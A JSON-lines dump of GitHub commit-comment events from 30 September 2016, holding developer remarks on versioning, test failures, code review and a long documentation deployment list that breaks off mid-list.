{"id":"4645575089","type":"CommitCommentEvent","actor":{"login":"RandomDSdevel"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19247205,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T20:07:47Z","updated_at":"2016-09-30T20:07:47Z","body":"@dwmw2:  Ah, so _that's_ where the confusion is stemming from!  Should one of us perhaps notify p11-kit's maintainer that they forgot to tag v0.23.2 in the software's Git repository?  We should probably seek clarification as to whether the v0.23.x series is 'devel' (as listed in the changelog,) or stable as well.  I'm still working on that PR to mark v0.23.2 as 'devel' and introduce v0.22.1 as stable, though, so does anybody else want to try and contact the dev(s?)  "}},"created_at":"2016-09-30T20:07:47Z"}
{"id":"4645577180","type":"CommitCommentEvent","actor":{"login":"KammiO"},"repo":{"name":"KammiO/kammio.github.io"},"payload":{"comment":{"id":19247212,"position":null,"line":null,"path":null,"commit_id":"3325bb57915c0bd13ff2379d20111da00b01313b","created_at":"2016-09-30T20:08:14Z","updated_at":"2016-09-30T20:08:14Z","body":"yes"}},"created_at":"2016-09-30T20:08:14Z"}
{"id":"4645578627","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19247216,"position":null,"line":null,"path":null,"commit_id":"894f59ca27f2169470f30063a720772893d5367e","created_at":"2016-09-30T20:08:31Z","updated_at":"2016-09-30T20:08:31Z","body":"Now the behavior is identical to the previous behavior. "}},"created_at":"2016-09-30T20:08:31Z"}
{"id":"4645582777","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19247230,"position":null,"line":null,"path":null,"commit_id":"e5544a60334314da5cd133d23231181783288a62","created_at":"2016-09-30T20:09:17Z","updated_at":"2016-09-30T20:09:17Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36439/testReport/) for this commit**"}},"created_at":"2016-09-30T20:09:17Z"}
{"id":"4645582825","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19247231,"position":null,"line":null,"path":null,"commit_id":"eb796b2710c394fead43c3f1b73be21428f9fa22","created_at":"2016-09-30T20:09:18Z","updated_at":"2016-09-30T20:09:18Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36440/testReport/) for this commit**"}},"created_at":"2016-09-30T20:09:18Z"}
{"id":"4645583080","type":"CommitCommentEvent","actor":{"login":"nagkumar91"},"repo":{"name":"nagkumar91/cmpe273-fall2016"},"payload":{"comment":{"id":19247234,"position":null,"line":null,"path":null,"commit_id":"16a04caa91dacda2c62493cf95e324320b86f5a3","created_at":"2016-09-30T20:09:21Z","updated_at":"2016-09-30T20:09:21Z","body":"It does not matter."}},"created_at":"2016-09-30T20:09:21Z"}
{"id":"4645585150","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247240,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:09:47Z","updated_at":"2016-09-30T20:09:47Z","body":"12346780909"}},"created_at":"2016-09-30T20:09:47Z"}
{"id":"4645585254","type":"CommitCommentEvent","actor":{"login":"samosaara"},"repo":{"name":"busting-cases/Eco-C"},"payload":{"comment":{"id":19247241,"position":null,"line":null,"path":null,"commit_id":"5ca86a496226683d99d78673674cb217446677bf","created_at":"2016-09-30T20:09:49Z","updated_at":"2016-09-30T20:09:49Z","body":"esse commit é merge."}},"created_at":"2016-09-30T20:09:49Z"}
{"id":"4645594564","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247274,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:11:48Z","updated_at":"2016-09-30T20:11:48Z","body":"12345678090909"}},"created_at":"2016-09-30T20:11:48Z"}
{"id":"4645594655","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247275,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:11:49Z","updated_at":"2016-09-30T20:11:49Z","body":"12346780909"}},"created_at":"2016-09-30T20:11:49Z"}
{"id":"4645596798","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19247279,"position":34,"line":65,"path":"spec/mongoid/configuration_spec.rb","commit_id":"ae237535c75e03742aed1c94f251ecd3b1ab991e","created_at":"2016-09-30T20:12:15Z","updated_at":"2016-09-30T20:12:15Z","body":"Something about it was bothering me, but it took a few iterations to find it 😬. Thanks for the review and feedback -  I appreciate it!"}},"created_at":"2016-09-30T20:12:15Z"}
{"id":"4645598059","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19247280,"position":5,"line":2570,"path":"src/pocketmine/Server.php","commit_id":"3cd745f18d5eb41c1e637d925e16f090d97c913f","created_at":"2016-09-30T20:12:31Z","updated_at":"2016-09-30T20:12:31Z","body":"oh, fail"}},"created_at":"2016-09-30T20:12:31Z"}
{"id":"4645598805","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247281,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:12:40Z","updated_at":"2016-09-30T20:12:40Z","body":"68f00d0"}},"created_at":"2016-09-30T20:12:40Z"}
{"id":"4645598845","type":"CommitCommentEvent","actor":{"login":"marrub--"},"repo":{"name":"Team-Doominati/Doominati"},"payload":{"comment":{"id":19247282,"position":null,"line":null,"path":null,"commit_id":"62a08a0dbf8cc4ca85c66f89a1c4e2e6faca2566","created_at":"2016-09-30T20:12:41Z","updated_at":"2016-09-30T20:12:41Z","body":"HAHAHAH WHO NEEDS DEFINED BEHAVIOUR ANYWAY"}},"created_at":"2016-09-30T20:12:41Z"}
{"id":"4645603387","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247291,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:13:40Z","updated_at":"2016-09-30T20:13:40Z","body":"1234432100"}},"created_at":"2016-09-30T20:13:40Z"}
{"id":"4645606113","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247299,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:14:15Z","updated_at":"2016-09-30T20:14:15Z","body":"168398326"}},"created_at":"2016-09-30T20:14:15Z"}
{"id":"4645608291","type":"CommitCommentEvent","actor":{"login":"mwpastore"},"repo":{"name":"jeremyevans/rodauth"},"payload":{"comment":{"id":19247308,"position":null,"line":null,"path":null,"commit_id":"e1c258ea707cddbcb391399ef540ccfd1f85414b","created_at":"2016-09-30T20:14:43Z","updated_at":"2016-09-30T20:14:43Z","body":"Very nice. If you'll excuse me, I need to pick up all the pieces of my mind off the floor. Thanks again, I'll let you know how it works out! "}},"created_at":"2016-09-30T20:14:43Z"}
{"id":"4645608948","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19247311,"position":36,"line":36,"path":"spec/lib/services/resource_sharer_spec.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T20:14:52Z","updated_at":"2016-09-30T20:14:52Z","body":"No, I think we're saying the same thing.  RBAC takes into account tenancy so it's a valid test for the rbac validation."}},"created_at":"2016-09-30T20:14:52Z"}
{"id":"4645609481","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247313,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:14:59Z","updated_at":"2016-09-30T20:14:59Z","body":"hosein1212"}},"created_at":"2016-09-30T20:14:59Z"}
{"id":"4645611525","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247317,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:15:25Z","updated_at":"2016-09-30T20:15:25Z","body":" 68f00d0 "}},"created_at":"2016-09-30T20:15:25Z"}
{"id":"4645612707","type":"CommitCommentEvent","actor":{"login":"elizabethdavis"},"repo":{"name":"elizabethdavis/sqlite-projects"},"payload":{"comment":{"id":19247318,"position":null,"line":null,"path":null,"commit_id":"93ec2e48c28c166feba06c0f91fc4d1ab4eface9","created_at":"2016-09-30T20:15:40Z","updated_at":"2016-09-30T20:15:40Z","body":"inserts one thousand lines into a database"}},"created_at":"2016-09-30T20:15:40Z"}
{"id":"4645614340","type":"CommitCommentEvent","actor":{"login":"chrisarcand"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19247322,"position":36,"line":36,"path":"spec/lib/services/resource_sharer_spec.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T20:16:01Z","updated_at":"2016-09-30T20:16:01Z","body":"Whew. Good.\n\nOn Fri, Sep 30, 2016 at 3:14 PM, Joe Rafaniello <notifications@github.com>\nwrote:\n\n> No, I think we're saying the same thing. RBAC takes into account tenancy\n> so it's a valid test for the rbac validation.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ManageIQ/manageiq/commit/a3e09928ca4a590eb7b982afa18939c279790d48#commitcomment-19247311>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACUWGhqsDWigoB6hTqNcQ1m8Twrs9QwZks5qvW2-gaJpZM4KLXqF>\n> .\n>\n\n\n\n-- \nChris Arcand\n@chrisarcand\n"}},"created_at":"2016-09-30T20:16:01Z"}
{"id":"4645614513","type":"CommitCommentEvent","actor":{"login":"tutul2010"},"repo":{"name":"tutul2010/appWeb82"},"payload":{"comment":{"id":19247323,"position":null,"line":null,"path":null,"commit_id":"8376e9a88140516ae474ab9b9544a59ed417d526","created_at":"2016-09-30T20:16:03Z","updated_at":"2016-09-30T20:16:03Z","body":"Next time ,we should follow  parametric sql-query in C#.net code(see default.aspx.cs file)"}},"created_at":"2016-09-30T20:16:03Z"}
{"id":"4645619354","type":"CommitCommentEvent","actor":{"login":"aplannersguide"},"repo":{"name":"aplannersguide/citygram-services"},"payload":{"comment":{"id":19247331,"position":null,"line":null,"path":null,"commit_id":"8354d06b81475cbcd3f8faf8d4ce6bb7ed14a3ac","created_at":"2016-09-30T20:17:04Z","updated_at":"2016-09-30T20:17:04Z","body":"Here is the incantation for this service. \r\n```\r\nPublisher.create! do |pub|\r\n  pub.title = \"Police Incidents\"\r\n  pub.endpoint = \"https://citygram-services.herokuapp.com/chattanooga-police-incidents\"\r\n  pub.active = false\r\n  pub.visible = false\r\n  pub.city = \"Chattanooga\"\r\n  pub.icon = `\"police-incidents.png\"`\r\n  pub.state = \"TN\"\r\n  pub.description = \"List of police incidents within the City of Chattanooga.\"\r\n  pub.tags = [\"chattanooga\"]\r\nend\r\n```"}},"created_at":"2016-09-30T20:17:04Z"}
{"id":"4645621643","type":"CommitCommentEvent","actor":{"login":"gerardng"},"repo":{"name":"new-gerard-lab4/starter-routes"},"payload":{"comment":{"id":19247333,"position":null,"line":null,"path":null,"commit_id":"78c8eca0a0c522a22314472892d934154e6dc5be","created_at":"2016-09-30T20:17:31Z","updated_at":"2016-09-30T20:17:31Z","body":"close #1 "}},"created_at":"2016-09-30T20:17:31Z"}
{"id":"4645623903","type":"CommitCommentEvent","actor":{"login":"gerardng"},"repo":{"name":"new-gerard-lab4/starter-routes"},"payload":{"comment":{"id":19247339,"position":null,"line":null,"path":null,"commit_id":"ea82bb63deda205ceb639dfb1f6bacae1c9404b1","created_at":"2016-09-30T20:17:59Z","updated_at":"2016-09-30T20:17:59Z","body":"closes #2 "}},"created_at":"2016-09-30T20:17:59Z"}
{"id":"4645624386","type":"CommitCommentEvent","actor":{"login":"dwmw2"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19247341,"position":null,"line":null,"path":null,"commit_id":"46be01e503df1e30dba395bffd87d2619e117748","created_at":"2016-09-30T20:18:04Z","updated_at":"2016-09-30T20:18:04Z","body":"I just prodded @stefwalter both here and on IRC, although we might not expect a response until Monday."}},"created_at":"2016-09-30T20:18:04Z"}
{"id":"4645624443","type":"CommitCommentEvent","actor":{"login":"gerardng"},"repo":{"name":"new-gerard-lab4/starter-routes"},"payload":{"comment":{"id":19247342,"position":null,"line":null,"path":null,"commit_id":"7c521de6a3685654999d9406a4fa2ba48e2fe583","created_at":"2016-09-30T20:18:06Z","updated_at":"2016-09-30T20:18:06Z","body":"closes #3 "}},"created_at":"2016-09-30T20:18:06Z"}
{"id":"4645624979","type":"CommitCommentEvent","actor":{"login":"gerardng"},"repo":{"name":"new-gerard-lab4/starter-routes"},"payload":{"comment":{"id":19247344,"position":null,"line":null,"path":null,"commit_id":"ea5791aa1f428dd6d27240a667c6146dd1e9e56d","created_at":"2016-09-30T20:18:12Z","updated_at":"2016-09-30T20:18:12Z","body":"closes #4 "}},"created_at":"2016-09-30T20:18:12Z"}
{"id":"4645628560","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19247350,"position":15,"line":44,"path":"core/src/main/java/esiptestbed/mudrod/ssearch/ranking/Learner.java","commit_id":"178312a22d2a5cfbc191e3817085df6af963430e","created_at":"2016-09-30T20:18:58Z","updated_at":"2016-09-30T20:18:58Z","body":"@lewismc I don't think putting the path string into config.xml would solve this problem. The problem is the path below is an absolute path. If I put mudrod source code folder in some other directory other than usr/local/, this would be a problem.\r\n`file:///usr/local/mudrod/core/src/main/resources/javaSVMWithSGDModel`"}},"created_at":"2016-09-30T20:18:58Z"}
{"id":"4645633420","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":19247363,"position":14,"line":87,"path":"FHEM/00_SIGNALduino.pm","commit_id":"4aaac4b0b84d3e50b68e63524d3c6948c4b613f5","created_at":"2016-09-30T20:19:59Z","updated_at":"2016-09-30T20:19:59Z","body":"Ein : reicht, da ja mittels Split der Text wieder in eine Liste überführt wird."}},"created_at":"2016-09-30T20:19:59Z"}
{"id":"4645636760","type":"CommitCommentEvent","actor":{"login":"hosein123454321"},"repo":{"name":"hosein123454321/-"},"payload":{"comment":{"id":19247376,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-30T20:20:39Z","updated_at":"2016-09-30T20:20:39Z","body":"168398326"}},"created_at":"2016-09-30T20:20:39Z"}
{"id":"4645639391","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"X123M3-256/X123M3-256.github.io"},"payload":{"comment":{"id":19247380,"position":null,"line":null,"path":null,"commit_id":"38c5cfc39b38a387250e7002b1e5cfbe498b8230","created_at":"2016-09-30T20:21:13Z","updated_at":"2016-09-30T20:21:13Z","body":"How about source (I assume) blender file?"}},"created_at":"2016-09-30T20:21:13Z"}
{"id":"4645641040","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19247394,"position":15,"line":44,"path":"core/src/main/java/esiptestbed/mudrod/ssearch/ranking/Learner.java","commit_id":"178312a22d2a5cfbc191e3817085df6af963430e","created_at":"2016-09-30T20:21:34Z","updated_at":"2016-09-30T20:21:34Z","body":"The point I am making is that you need to change this and then compile the code. The issue is that the Hadoop code interprets the colon ':' as the system file separator e.g. the path separator. It therefore splits up file:/// into 'file' and '///'.\r\nWhat I am saying is that you need to change this to the location of the model on your local machine then recompile the code such that the properties are configured properly. OK."}},"created_at":"2016-09-30T20:21:34Z"}
{"id":"4645647536","type":"CommitCommentEvent","actor":{"login":"aplannersguide"},"repo":{"name":"aplannersguide/citygram-services"},"payload":{"comment":{"id":19247412,"position":null,"line":null,"path":null,"commit_id":"8354d06b81475cbcd3f8faf8d4ce6bb7ed14a3ac","created_at":"2016-09-30T20:22:52Z","updated_at":"2016-09-30T20:22:52Z","body":"@t-richards Did I do this correctly? I haven't tested it but just followed the great work you did on the code violation service. I'm not sure if I used the right \"does not equal\" sign (example below) for the incident descriptions. There are a lot of \"Misc Report\" and I don't people would want them blowing up their inbox.  \r\n\r\n`\r\n'$where' => <<-WHERE.oneline \r\nincident_description != 'Misc Report'\r\n`"}},"created_at":"2016-09-30T20:22:52Z"}
{"id":"4645652106","type":"CommitCommentEvent","actor":{"login":"robsontavaresnonato"},"repo":{"name":"robsontavaresnonato/facerecog"},"payload":{"comment":{"id":19247424,"position":null,"line":null,"path":null,"commit_id":"152b31296e3c7af1bc9666a58844b156dc5763c6","created_at":"2016-09-30T20:23:50Z","updated_at":"2016-09-30T20:23:50Z","body":"Capchas II - Complexidade com Cores"}},"created_at":"2016-09-30T20:23:50Z"}
{"id":"4645658838","type":"CommitCommentEvent","actor":{"login":"renier"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19247446,"position":26,"line":37,"path":"helpers/order/order.go","commit_id":"1cfd1388f991ae31e2d1495ad081378fe0c3c367","created_at":"2016-09-30T20:25:14Z","updated_at":"2016-09-30T20:25:14Z","body":"The one call to getOrders sounds expensive, in the case of multiple orders.\r\n\r\nBased on how it is used now, we can assume they are all from the same order, but I don't want to add another argument to the  function signature. What if the items all had item.order.id set? Even if only the first item has it set, then you can assume all belong to that order, and that's what you could use to optimize the api call. If there is no billing order id found, then we just use GetBillingItem."}},"created_at":"2016-09-30T20:25:14Z"}
{"id":"4645659307","type":"CommitCommentEvent","actor":{"login":"markjcrane"},"repo":{"name":"mafoo/fusionpbx-install.sh"},"payload":{"comment":{"id":19247448,"position":null,"line":null,"path":null,"commit_id":"2da16e1427728a0c0d06742edc83f39a22fac9ae","created_at":"2016-09-30T20:25:20Z","updated_at":"2016-09-30T20:25:20Z","body":"chmod -R 755 /var/www/fusionpbx/secure\r\nSeems needed for some of the scripts in that directory."}},"created_at":"2016-09-30T20:25:20Z"}
{"id":"4645664165","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19247459,"position":null,"line":null,"path":null,"commit_id":"58d444878e55de468ec680fe6034d5059431a3bd","created_at":"2016-09-30T20:26:20Z","updated_at":"2016-09-30T20:26:20Z","body":"The following doc(s) have been deployed to the [1894image](https:///docs) Multidev environment:\n- [source/docs/assets/images/add-ssh-key-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/add-ssh-key-dashboard.png)\n- [source/docs/assets/images/backup-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/backup-tool.png)\n- [source/docs/assets/images/billing_update.jpg](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/billing_update.jpg)\n- [source/docs/assets/images/commit-deployed-pantheon-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/commit-deployed-pantheon-dashboard.png)\n- [source/docs/assets/images/commit-id.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/commit-id.png)\n- [source/docs/assets/images/confirm-plan-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/confirm-plan-dashboard.png)\n- [source/docs/assets/images/connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/connection-info.png)\n- [source/docs/assets/images/connection-mode-git.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/connection-mode-git.png)\n- [source/docs/assets/images/connection-mode-sftp.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/connection-mode-sftp.png)\n- [source/docs/assets/images/convert-urls.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/convert-urls.png)\n- [source/docs/assets/images/create-org-invite-team-members.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/create-org-invite-team-members.png)\n- [source/docs/assets/images/create-site-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/create-site-dashboard.png)\n- [source/docs/assets/images/dashboard/add-ssh-key-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/add-ssh-key-dashboard.png)\n- [source/docs/assets/images/dashboard/backup-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/backup-tool.png)\n- [source/docs/assets/images/dashboard/billing_update.jpg](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/billing_update.jpg)\n- [source/docs/assets/images/dashboard/commit-deployed-pantheon-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/commit-deployed-pantheon-dashboard.png)\n- [source/docs/assets/images/dashboard/commit-id.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/commit-id.png)\n- [source/docs/assets/images/dashboard/confirm-plan-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/confirm-plan-dashboard.png)\n- [source/docs/assets/images/dashboard/connection-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/connection-info.png)\n- [source/docs/assets/images/dashboard/connection-mode-git.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/connection-mode-git.png)\n- [source/docs/assets/images/dashboard/connection-mode-sftp.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/connection-mode-sftp.png)\n- [source/docs/assets/images/dashboard/convert-urls.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/convert-urls.png)\n- [source/docs/assets/images/dashboard/create-org-invite-team-members.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/create-org-invite-team-members.png)\n- [source/docs/assets/images/dashboard/create-site-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/create-site-dashboard.png)\n- [source/docs/assets/images/dashboard/deploy-live.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/deploy-live.png)\n- [source/docs/assets/images/dashboard/deploy-log-live-env.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/deploy-log-live-env.png)\n- [source/docs/assets/images/dashboard/dev-code-pendingchanges-commit.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/dev-code-pendingchanges-commit.png)\n- [source/docs/assets/images/dashboard/diff-screen.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/diff-screen.png)\n- [source/docs/assets/images/dashboard/direct-download-archive.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/direct-download-archive.png)\n- [source/docs/assets/images/dashboard/direct-download-backup.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/direct-download-backup.png)\n- [source/docs/assets/images/dashboard/drush-aliases.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/drush-aliases.png)\n- [source/docs/assets/images/dashboard/edu-read-instructions.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/edu-read-instructions.png)\n- [source/docs/assets/images/dashboard/edu-site-selector.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/edu-site-selector.png)\n- [source/docs/assets/images/dashboard/environment-access.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/environment-access.png)\n- [source/docs/assets/images/dashboard/git-string.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/git-string.png)\n- [source/docs/assets/images/dashboard/import-tool-db-and-files.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/import-tool-db-and-files.png)\n- [source/docs/assets/images/dashboard/interface-dev-code-sftp-commit.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/interface-dev-code-sftp-commit.png)\n- [source/docs/assets/images/dashboard/interface-site-settings-about.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/interface-site-settings-about.png)\n- [source/docs/assets/images/dashboard/interface-workflow-tool.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/interface-workflow-tool.png)\n- [source/docs/assets/images/dashboard/invite-business-owner.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/invite-business-owner.png)\n- [source/docs/assets/images/dashboard/launch-check-file-system-error.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/launch-check-file-system-error.png)\n- [source/docs/assets/images/dashboard/lock-environment.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/lock-environment.png)\n- [source/docs/assets/images/dashboard/machine-token-ready.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/machine-token-ready.png)\n- [source/docs/assets/images/dashboard/manual-site-backup.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/manual-site-backup.png)\n- [source/docs/assets/images/dashboard/merged-pull-request-1-dashboard.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/merged-pull-request-1-dashboard.png)\n- [source/docs/assets/images/dashboard/migrate-existing-site.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/migrate-existing-site.png)\n- [source/docs/assets/images/dashboard/migration-authentication-error.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/migration-authentication-error.png)\n- [source/docs/assets/images/dashboard/migration-authentication-prompt.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/migration-authentication-prompt.png)\n- [source/docs/assets/images/dashboard/multi_org1.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/multi_org1.png)\n- [source/docs/assets/images/dashboard/multi_org2.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/multi_org2.png)\n- [source/docs/assets/images/dashboard/mysql-info.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/mysql-info.png)\n- [source/docs/assets/images/dashboard/new-env-configs.png](https://github.com/pantheon-systems/documentation/commit/65b0a46599f6d5c3921886be066d78204d80c3ac/source/docs/assets/images/dashboard/new-env-configs.png)\n- 